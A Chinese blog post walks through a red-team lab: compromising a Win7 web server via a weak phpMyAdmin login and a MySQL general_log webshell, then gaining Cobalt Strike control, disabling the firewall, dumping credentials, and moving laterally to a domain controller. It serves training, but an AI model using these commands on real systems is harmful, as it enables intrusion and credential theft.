0x00.網路拓撲

0x01.環境搭建
一共有三臺虛擬機Win7(對外),Win2003和Win2008(對內)
- Win2003:添加一張網卡(VMnet1)
- Win2008:添加一張網卡(VMnet1)
- Win7:添加兩張網卡(VMnet1,VMnet8)
網路環境配置完成之后首先打開Win2008,使用默認賬號GOD\liukaifeng01,密碼hongrisec@2019進行登錄,登錄后提示密碼已過期,修改新密碼之后重啟即可,然后切換到GOD\Administrator用戶重復前面的操作,重啟Win2008后打開另外兩臺機器,在Win7上打開Phpstudy服務
Win2008:

Win7:


開啟Phpstudy后訪問本機web頁面查看服務是否正常

至此環境搭建完成.
0x02.資訊收集
Nmap掃描目標埠,檢測服務

發現目標開啟Web服務和資料庫服務,訪問目標Web服務

發現探針頁面,使用dirsearch掃描網站目錄

發現存在phpmyadmin
0x03.漏洞探測

直接嘗試弱口令登錄,root/root成功登錄

登錄phpmyadmin后可以嘗試into outfile寫檔案getshell或者日志getshell
寫檔案getshell首先查看資料庫是否有讀寫檔案權限

secure_file_priv=null 則資料庫沒有讀寫檔案權限,那么換另外一種方法,使用日志getshell
0x04.漏洞利用

general_log=OFF 則日志功能關閉,先將日志功能打開然后修改日志保存路徑到網站目錄下

SET GLOBAL general_log="log" 打開日志功能

SET GLOBAL general_log_file="C:/phpStudy/WWW/loglog.php" 修改日志保存路徑在網站根目錄下

修改成功

直接寫入一句話木馬getshell

訪問日志檔案,成功getshell


使用蟻劍連接剛剛寫入的webshell,進入虛擬終端執行whoami查看當前用戶

ipconfig查看網卡資訊發現有兩張網卡,一張通往外網,一張為內網
猜測內網有其他機器,利用Cobalt Strike生成后門并上傳 進行權限提升
0x05.內網資訊收集

創建監聽器

生成后門,監聽器選擇剛剛創建的監聽器

將后門檔案上傳至靶機

在蟻劍中使用虛擬終端運行后門檔案,運行完成后CS中靶機已經上線

sleep 0 設定回連間隔為0s

shell whoami 查看當前用戶

shell hostname 查看主機名

shell net users 查看靶機上存在的用戶


shell systeminfo 查看靶機資訊

shell tasklist 查看靶機行程
收集完靶機基本資訊后接下來判斷內網是否存在"域"

shell net config workstation 發現存在域GOD,且域內有三臺主機

shell net view /domain:god 查看域內主機
0x06.權限提升

選擇自帶權限提升功能

選擇監聽器和提權方式


提權成功會以system身份新上線一個會話
0x07.橫向移動
在進行橫向移動前先將防火墻關閉

shell netsh firewall show state 檢查防火墻狀態

shell netsh advfirewall set allprofiles state off 關閉防火墻

點擊目標串列可以查看當前域內的所有目標

shell dclist 查看域控串列

hashdump抓取本機用戶哈希密碼

logonpasswords獲取明文密碼

查看密碼憑證
接下來準備攻擊域控

首先創建一個smb監聽器


橫向移動到域控,用戶名和密碼選擇剛付訓取到的,監聽器選擇創建的SMB監聽器,會話任選一個即可

點擊運行后域控成功上線
接著對域成員進行攻擊


和攻擊域控一樣的方法,監聽器選擇SMB,會話選擇域控

至此,拿下內網全部主機
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/500793.html
標籤:其他
上一篇:“ 我是一名阿里在職9年軟體測驗工程師,我的經歷也許能幫到處于迷茫期的你 ”
下一篇:「學習筆記」高斯消元
